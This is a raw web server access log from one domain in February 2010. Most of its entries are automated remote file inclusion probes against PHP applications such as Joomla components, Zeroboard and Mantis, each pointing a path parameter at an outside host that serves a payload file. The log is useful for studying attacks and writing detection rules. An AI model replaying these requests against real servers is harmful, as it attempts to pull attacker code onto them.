91.121.25.16 - - [12/Feb/2010:08:25:03 -0800] "GET /logs/access_100111.log//bbs//skin/ggambo7002_board/write.php?dir=http://bethdodd.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [12/Feb/2010:08:25:11 -0800] "GET /logs/access_100112.log//bbs//skin/ggambo7002_board/write.php?dir=http://bethdodd.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:08:25:15 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:08:25:15 -0800] "GET /logs/access_100123.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:08:25:18 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:08:25:24 -0800] "GET /logs/access_100115.log%20%20/htmltonuke.php?filnavn=http://210.116.103.118/~kardex/RosebanditZ/id/a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:08:25:36 -0800] "GET /logs/access_100118.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [12/Feb/2010:08:25:53 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [12/Feb/2010:08:25:54 -0800] "GET /orange_g/forum/viewtopic.php?p=25197 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
77.221.130.15 - - [12/Feb/2010:08:26:06 -0800] "GET /logs/access_100208.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [12/Feb/2010:08:26:09 -0800] "GET /orange_g/forum/viewtopic.php?p=25355 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
77.221.130.15 - - [12/Feb/2010:08:26:19 -0800] "GET /logs/access_100202.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:08:26:19 -0800] "GET /logs/access_100121.log%20%20//bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:08:26:31 -0800] "GET /logs/uks_gallery_v3010//write.php?dir=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:08:26:31 -0800] "GET /logs/access_100112.log%20%20/uks_gallery_v3010//write.php?dir=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:08:26:31 -0800] "GET /uks_gallery_v3010//write.php?dir=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [12/Feb/2010:08:26:56 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [12/Feb/2010:08:27:01 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:08:27:02 -0800] "GET /logs/access_100129.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:08:27:06 -0800] "GET /uks_gallery_v3010//write.php?dir=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:08:27:06 -0800] "GET /logs/access_100112.log%20%20/uks_gallery_v3010//write.php?dir=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:08:27:07 -0800] "GET /logs/uks_gallery_v3010//write.php?dir=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:08:27:27 -0800] "GET /logs/access_100122.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:08:28:32 -0800] "GET /logs/access_100208.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:08:28:48 -0800] "GET /logs/access_100202.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [12/Feb/2010:08:29:05 -0800] "GET /logs/access_100129.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:29:18 -0800] "GET /logs/access_100119.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:29:18 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:29:18 -0800] "GET /logs/access_100119.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:29:18 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:29:19 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:29:19 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:29:23 -0800] "GET /logs/access_100109.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:29:23 -0800] "GET /logs/access_100109.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:30:54 -0800] "GET /logs/access_100119.log//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:30:54 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:30:54 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:30:57 -0800] "GET /logs/access_100119.log//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:30:57 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:30:58 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:08:31:01 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:08:31:01 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:08:31:01 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:31:06 -0800] "GET /logs/access_100109.log//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:08:31:09 -0800] "GET /logs/access_100109.log//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:08:31:10 -0800] "GET /mantis/login_page.php?g_meta_include_file=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:08:31:10 -0800] "GET /logs/mantis/login_page.php?g_meta_include_file=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:08:31:10 -0800] "GET /logs/access_100118.log%20%20/mantis/login_page.php?g_meta_include_file=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:08:31:11 -0800] "GET /logs/access_100131.log///coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:08:31:47 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:08:31:47 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:08:31:47 -0800] "GET /logs/access_100103.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:08:32:03 -0800] "GET /logs/access_100117.log%20%20/mantis/login_page.php?g_meta_include_file=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:08:32:14 -0800] "GET /logs/access_100105.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [12/Feb/2010:08:32:29 -0800] "GET /logs///bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [12/Feb/2010:08:32:43 -0800] "GET /logs/access_100126.log%20%20///bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [12/Feb/2010:08:32:54 -0800] "GET //bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [12/Feb/2010:08:32:54 -0800] "GET /bbs/write_update.php?board_skin_path=http://bethdodd.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [12/Feb/2010:08:32:54 -0800] "GET /logs/access_100128.log%20%20//bbs/write_update.php?board_skin_path=http://bethdodd.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [12/Feb/2010:08:32:54 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://bethdodd.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:08:33:52 -0800] "GET /logs/access_100119.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.5.70.38 - - [12/Feb/2010:08:35:22 -0800] "GET / HTTP/1.0" 200 3626 "http://puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; (R1 1.5))" "puaga.com"
69.162.109.186 - - [12/Feb/2010:08:35:33 -0800] "GET /logs/index.php?load=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.109.186 - - [12/Feb/2010:08:35:33 -0800] "GET /logs/access_100104.log/index.php?load=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.109.186 - - [12/Feb/2010:08:35:34 -0800] "GET /index.php?load=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:08:38:36 -0800] "GET /logs/access_100111.log//bbs////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [12/Feb/2010:08:39:26 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [12/Feb/2010:08:39:27 -0800] "GET /orange_g/forum/viewtopic.php?p=27002 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
91.121.25.16 - - [12/Feb/2010:08:40:36 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://bethdodd.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [12/Feb/2010:08:40:45 -0800] "GET /logs/access_100128.log//bbs/write_update.php?board_skin_path=http://bethdodd.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:08:43:10 -0800] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:08:43:10 -0800] "GET /logs///modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
62.141.56.136 - - [12/Feb/2010:08:43:50 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.141.56.136 - - [12/Feb/2010:08:43:51 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.141.56.136 - - [12/Feb/2010:08:43:51 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [12/Feb/2010:08:44:41 -0800] "GET /logs/access_100119.log//bbs/write_update.php?board_skin_path=http://bethdodd.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:08:45:56 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:08:45:56 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:08:45:56 -0800] "GET /logs/access_100120.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:08:45:58 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:08:45:58 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:08:45:58 -0800] "GET /logs/access_100120.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:08:46:03 -0800] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [12/Feb/2010:08:46:06 -0800] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [12/Feb/2010:08:46:49 -0800] "GET /ideal/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
221.139.0.75 - - [12/Feb/2010:08:46:56 -0800] "GET /logs/access_100117.log%20%20//zboard/skin/jaemanstyle_b01_brown//setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [12/Feb/2010:08:46:56 -0800] "GET /zboard/skin/jaemanstyle_b01_brown//setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [12/Feb/2010:08:46:56 -0800] "GET /logs//zboard/skin/jaemanstyle_b01_brown//setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:08:48:11 -0800] "GET /logs/access_100202.log//delete_comment.php?board_skin_path=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:08:48:11 -0800] "GET /logs//delete_comment.php?board_skin_path=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:08:48:11 -0800] "GET /delete_comment.php?board_skin_path=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:08:48:21 -0800] "GET /////////delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:08:48:21 -0800] "GET /logs/access_100202.log//////////delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:08:48:22 -0800] "GET /logs//////////delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:08:48:47 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:08:48:47 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:08:48:47 -0800] "GET /logs/access_100109.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:08:49:05 -0800] "GET /logs/access_100126.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:08:49:29 -0800] "GET /logs/access_100202.log//////////delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:08:49:29 -0800] "GET /////////delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:08:49:29 -0800] "GET /logs//////////delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:08:49:35 -0800] "GET /logs/?path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:08:49:35 -0800] "GET /logs/access_100107.log%20%20/?path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:08:49:35 -0800] "GET /?path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.141.56.136 - - [12/Feb/2010:08:50:08 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.141.56.136 - - [12/Feb/2010:08:50:08 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.141.56.136 - - [12/Feb/2010:08:50:10 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:08:50:18 -0800] "GET /?path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:08:50:18 -0800] "GET /logs/access_100107.log%20%20/?path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:08:50:18 -0800] "GET /logs/?path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [12/Feb/2010:08:50:47 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [12/Feb/2010:08:50:47 -0800] "GET /logs/access_100104.log%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:08:50:48 -0800] "GET /logs/access_100107.log%20%20/?path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:08:50:48 -0800] "GET /logs/?path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:08:50:48 -0800] "GET /?path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [12/Feb/2010:08:50:50 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [12/Feb/2010:08:51:11 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [12/Feb/2010:08:51:11 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [12/Feb/2010:08:51:11 -0800] "GET /logs/access_100104.log%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
